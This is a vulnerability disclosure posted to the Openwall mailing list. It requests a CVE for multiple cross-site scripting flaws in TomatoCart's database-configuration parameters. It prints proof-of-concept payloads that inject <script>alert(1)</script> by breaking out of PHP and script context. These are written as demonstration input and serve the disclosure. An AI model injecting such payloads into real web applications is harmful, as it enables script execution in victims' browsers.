Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 24 Nov 2016 15:25:10 +0800
From: haojun hou <>
Subject: CVE request - TomatoCart Multiple Cross-Site Scripting

TomatoCart - Multiple Cross-Site Scripting (XSS) 

Procuct: TomatoCart

Vendor: TomatoCart

Vunlerable Version: and probably prior

Tested Version:

Author: Haojun Hou in ADLab of Venustech


Advisory Details:

Haojun Hou in ADLab of Venustech discovered Multiple Cross-Site Scripting (XSS) in TomatoCart, which can be exploited to add,modify or delete information in application`s database and gain complete control over the application.


The vulnerability exists due to insufficientfiltration of user-supplied data in multiple HTTP POST parameters passed to “TomatoCart-v1-released-v1.” url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website.

The exploitation examples below uses the "alert()" JavaScript function to see a  pop-up messagebox:


DB_DATABASE=  <>"?>";</script><script>alert(1);</script><script>"<?php"


DB_SERVER_PASSWORD= "?>";</script><script>alert(1);</script><script>"<?php"


DB_TABLE_PREFIX= "?>";</script><script>alert(1);</script><script>"<?php"


DB_DATABASE_CLASS= "?>";</script><script>alert(1);</script><script>"<?php"


DB_SERVER_USERNAME= "?>";</script><script>alert(1);</script><script>"<?php"


DB_SERVER= "?>";</script><script>alert(1);</script><script>"<?php"


Could you please help me assign a CVE for this issue?


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ